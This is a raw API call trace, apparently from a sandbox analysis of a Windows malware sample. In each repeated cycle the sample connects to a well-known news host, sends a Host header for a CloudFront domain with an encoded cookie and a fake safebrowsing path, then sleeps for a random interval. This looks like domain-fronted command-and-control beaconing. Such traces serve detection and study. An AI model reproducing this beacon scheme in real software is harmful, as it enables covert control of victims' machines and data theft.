[0326.695] GetLastError () returned 0x0
[0326.695] SetLastError (dwErrCode=0x0)
[0326.695] htonl (hostlong=0x0) returned 0x0
[0326.695] GetLastError () returned 0x0
[0326.695] SetLastError (dwErrCode=0x0)
[0326.695] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0326.695] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0326.695] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0326.695] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0327.391] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0327.391] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0327.391] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0327.391] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0xb, wMilliseconds=0x2c7))
[0327.391] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0327.391] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0327.392] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0xb, wMilliseconds=0x2c7))
[0327.392] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3833e0) returned 1
[0327.392] CryptGenRandom (in: hProv=0x3833e0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0327.392] CryptReleaseContext (hProv=0x3833e0, dwFlags=0x0) returned 1
[0327.392] Sleep (dwMilliseconds=0x3806)
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0337.395] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0337.395] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0337.395] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] htonl (hostlong=0xa000000) returned 0xa
[0337.395] htonl (hostlong=0x22000000) returned 0x22
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] htonl (hostlong=0xa000000) returned 0xa
[0337.395] htonl (hostlong=0x47000000) returned 0x47
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.395] htonl (hostlong=0xa000000) returned 0xa
[0337.395] htonl (hostlong=0x1f000000) returned 0x1f
[0337.395] GetLastError () returned 0x0
[0337.395] SetLastError (dwErrCode=0x0)
[0337.396] htonl (hostlong=0x7000000) returned 0x7
[0337.396] htonl (hostlong=0x0) returned 0x0
[0337.396] htonl (hostlong=0x8000000) returned 0x8
[0337.396] htonl (hostlong=0x2000000) returned 0x2
[0337.396] htonl (hostlong=0x8000000) returned 0x8
[0337.396] htonl (hostlong=0x6000000) returned 0x6
[0337.396] htonl (hostlong=0x6000000) returned 0x6
[0337.396] GetLastError () returned 0x0
[0337.396] SetLastError (dwErrCode=0x0)
[0337.396] htonl (hostlong=0x0) returned 0x0
[0337.396] GetLastError () returned 0x0
[0337.396] SetLastError (dwErrCode=0x0)
[0337.396] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0337.396] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0337.396] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0337.396] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0338.083] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0338.083] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0338.083] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0338.083] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x16, wMilliseconds=0x19a))
[0338.083] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0338.083] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0338.083] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x16, wMilliseconds=0x19a))
[0338.083] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383798) returned 1
[0338.083] CryptGenRandom (in: hProv=0x383798, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0338.083] CryptReleaseContext (hProv=0x383798, dwFlags=0x0) returned 1
[0338.083] Sleep (dwMilliseconds=0x3280)
[0348.092] GetLastError () returned 0x0
[0348.092] SetLastError (dwErrCode=0x0)
[0348.092] GetLastError () returned 0x0
[0348.092] SetLastError (dwErrCode=0x0)
[0348.092] GetLastError () returned 0x0
[0348.092] SetLastError (dwErrCode=0x0)
[0348.092] GetLastError () returned 0x0
[0348.092] SetLastError (dwErrCode=0x0)
[0348.092] GetLastError () returned 0x0
[0348.092] SetLastError (dwErrCode=0x0)
[0348.092] GetLastError () returned 0x0
[0348.092] SetLastError (dwErrCode=0x0)
[0348.092] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0348.092] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0348.092] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0348.092] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0348.093] GetLastError () returned 0x0
[0348.093] SetLastError (dwErrCode=0x0)
[0348.093] htonl (hostlong=0xa000000) returned 0xa
[0348.093] htonl (hostlong=0x22000000) returned 0x22
[0348.093] GetLastError () returned 0x0
[0348.093] SetLastError (dwErrCode=0x0)
[0348.093] htonl (hostlong=0xa000000) returned 0xa
[0348.093] htonl (hostlong=0x47000000) returned 0x47
[0348.093] GetLastError () returned 0x0
[0348.093] SetLastError (dwErrCode=0x0)
[0348.093] htonl (hostlong=0xa000000) returned 0xa
[0348.093] htonl (hostlong=0x1f000000) returned 0x1f
[0348.093] GetLastError () returned 0x0
[0348.093] SetLastError (dwErrCode=0x0)
[0348.093] htonl (hostlong=0x7000000) returned 0x7
[0348.093] htonl (hostlong=0x0) returned 0x0
[0348.093] htonl (hostlong=0x8000000) returned 0x8
[0348.093] htonl (hostlong=0x2000000) returned 0x2
[0348.093] htonl (hostlong=0x8000000) returned 0x8
[0348.093] htonl (hostlong=0x6000000) returned 0x6
[0348.093] htonl (hostlong=0x6000000) returned 0x6
[0348.093] GetLastError () returned 0x0
[0348.093] SetLastError (dwErrCode=0x0)
[0348.093] htonl (hostlong=0x0) returned 0x0
[0348.093] GetLastError () returned 0x0
[0348.093] SetLastError (dwErrCode=0x0)
[0348.093] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0348.093] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0348.093] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0348.093] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0348.760] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0348.760] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0348.760] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0348.760] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x21, wMilliseconds=0x4e))
[0348.760] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0348.760] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0348.760] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x21, wMilliseconds=0x4e))
[0348.760] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x3834f0) returned 1
[0348.761] CryptGenRandom (in: hProv=0x3834f0, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0348.761] CryptReleaseContext (hProv=0x3834f0, dwFlags=0x0) returned 1
[0348.761] Sleep (dwMilliseconds=0x38a0)
[0358.770] GetLastError () returned 0x0
[0358.770] SetLastError (dwErrCode=0x0)
[0358.770] GetLastError () returned 0x0
[0358.770] SetLastError (dwErrCode=0x0)
[0358.770] GetLastError () returned 0x0
[0358.770] SetLastError (dwErrCode=0x0)
[0358.770] GetLastError () returned 0x0
[0358.770] SetLastError (dwErrCode=0x0)
[0358.770] GetLastError () returned 0x0
[0358.770] SetLastError (dwErrCode=0x0)
[0358.770] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0358.770] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0358.770] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0358.770] InternetConnectA (hInternet=0xcc0004, lpszServerName="asset.wsj.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0358.771] GetLastError () returned 0x0
[0358.771] SetLastError (dwErrCode=0x0)
[0358.771] htonl (hostlong=0xa000000) returned 0xa
[0358.771] htonl (hostlong=0x22000000) returned 0x22
[0358.771] GetLastError () returned 0x0
[0358.771] SetLastError (dwErrCode=0x0)
[0358.771] htonl (hostlong=0xa000000) returned 0xa
[0358.771] htonl (hostlong=0x47000000) returned 0x47
[0358.771] GetLastError () returned 0x0
[0358.771] SetLastError (dwErrCode=0x0)
[0358.771] htonl (hostlong=0xa000000) returned 0xa
[0358.771] htonl (hostlong=0x1f000000) returned 0x1f
[0358.771] GetLastError () returned 0x0
[0358.771] SetLastError (dwErrCode=0x0)
[0358.771] htonl (hostlong=0x7000000) returned 0x7
[0358.771] htonl (hostlong=0x0) returned 0x0
[0358.771] htonl (hostlong=0x8000000) returned 0x8
[0358.771] htonl (hostlong=0x2000000) returned 0x2
[0358.771] htonl (hostlong=0x8000000) returned 0x8
[0358.771] htonl (hostlong=0x6000000) returned 0x6
[0358.771] htonl (hostlong=0x6000000) returned 0x6
[0358.771] GetLastError () returned 0x0
[0358.771] SetLastError (dwErrCode=0x0)
[0358.771] htonl (hostlong=0x0) returned 0x0
[0358.771] GetLastError () returned 0x0
[0358.771] SetLastError (dwErrCode=0x0)
[0358.771] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0358.771] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0358.771] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0358.771] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0359.445] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0359.445] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0359.445] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0359.445] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x2b, wMilliseconds=0x302))
[0359.445] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0359.445] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0359.445] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x2b, wMilliseconds=0x302))
[0359.445] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383138) returned 1
[0359.445] CryptGenRandom (in: hProv=0x383138, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0359.445] CryptReleaseContext (hProv=0x383138, dwFlags=0x0) returned 1
[0359.445] Sleep (dwMilliseconds=0x306b)
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0369.452] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0369.452] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0369.452] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] htonl (hostlong=0xa000000) returned 0xa
[0369.452] htonl (hostlong=0x22000000) returned 0x22
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] htonl (hostlong=0xa000000) returned 0xa
[0369.452] htonl (hostlong=0x47000000) returned 0x47
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] htonl (hostlong=0xa000000) returned 0xa
[0369.452] htonl (hostlong=0x1f000000) returned 0x1f
[0369.452] GetLastError () returned 0x0
[0369.452] SetLastError (dwErrCode=0x0)
[0369.452] htonl (hostlong=0x7000000) returned 0x7
[0369.452] htonl (hostlong=0x0) returned 0x0
[0369.452] htonl (hostlong=0x8000000) returned 0x8
[0369.452] htonl (hostlong=0x2000000) returned 0x2
[0369.452] htonl (hostlong=0x8000000) returned 0x8
[0369.452] htonl (hostlong=0x6000000) returned 0x6
[0369.453] htonl (hostlong=0x6000000) returned 0x6
[0369.453] GetLastError () returned 0x0
[0369.453] SetLastError (dwErrCode=0x0)
[0369.453] htonl (hostlong=0x0) returned 0x0
[0369.453] GetLastError () returned 0x0
[0369.453] SetLastError (dwErrCode=0x0)
[0369.453] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0369.453] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0369.453] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0369.453] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0370.129] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0370.129] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0370.130] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0370.130] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x36, wMilliseconds=0x1ca))
[0370.130] InternetCloseHandle (hInternet=0xcc0008) returned 1
[0370.130] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0370.130] GetLocalTime (in: lpSystemTime=0x2cf9d0 | out: lpSystemTime=0x2cf9d0*(wYear=0x7e2, wMonth=0x2, wDayOfWeek=0x5, wDay=0x10, wHour=0x5, wMinute=0x22, wSecond=0x36, wMilliseconds=0x1ca))
[0370.130] CryptAcquireContextA (in: phProv=0x2cf9b8, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2cf9b8*=0x383f08) returned 1
[0370.130] CryptGenRandom (in: hProv=0x383f08, dwLen=0x4, pbBuffer=0x2cf9dc | out: pbBuffer=0x2cf9dc) returned 1
[0370.130] CryptReleaseContext (hProv=0x383f08, dwFlags=0x0) returned 1
[0370.130] Sleep (dwMilliseconds=0x3457)
[0380.141] GetLastError () returned 0x0
[0380.141] SetLastError (dwErrCode=0x0)
[0380.141] GetLastError () returned 0x0
[0380.141] SetLastError (dwErrCode=0x0)
[0380.141] GetLastError () returned 0x0
[0380.141] SetLastError (dwErrCode=0x0)
[0380.141] GetLastError () returned 0x0
[0380.141] SetLastError (dwErrCode=0x0)
[0380.141] GetLastError () returned 0x0
[0380.141] SetLastError (dwErrCode=0x0)
[0380.141] GetLastError () returned 0x0
[0380.141] SetLastError (dwErrCode=0x0)
[0380.141] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0380.141] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0380.141] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0380.141] InternetConnectA (hInternet=0xcc0004, lpszServerName="maptile.usnews.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0380.141] GetLastError () returned 0x0
[0380.141] SetLastError (dwErrCode=0x0)
[0380.142] htonl (hostlong=0xa000000) returned 0xa
[0380.142] htonl (hostlong=0x22000000) returned 0x22
[0380.142] GetLastError () returned 0x0
[0380.142] SetLastError (dwErrCode=0x0)
[0380.142] htonl (hostlong=0xa000000) returned 0xa
[0380.142] htonl (hostlong=0x47000000) returned 0x47
[0380.142] GetLastError () returned 0x0
[0380.142] SetLastError (dwErrCode=0x0)
[0380.142] htonl (hostlong=0xa000000) returned 0xa
[0380.142] htonl (hostlong=0x1f000000) returned 0x1f
[0380.142] GetLastError () returned 0x0
[0380.142] SetLastError (dwErrCode=0x0)
[0380.142] htonl (hostlong=0x7000000) returned 0x7
[0380.142] htonl (hostlong=0x0) returned 0x0
[0380.142] htonl (hostlong=0x8000000) returned 0x8
[0380.142] htonl (hostlong=0x2000000) returned 0x2
[0380.142] htonl (hostlong=0x8000000) returned 0x8
[0380.142] htonl (hostlong=0x6000000) returned 0x6
[0380.142] htonl (hostlong=0x6000000) returned 0x6
[0380.142] GetLastError () returned 0x0
[0380.142] SetLastError (dwErrCode=0x0)
[0380.142] htonl (hostlong=0x0) returned 0x0
[0380.142] GetLastError () returned 0x0
[0380.142] SetLastError (dwErrCode=0x0)
[0380.142] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0380.142] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0380.142] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
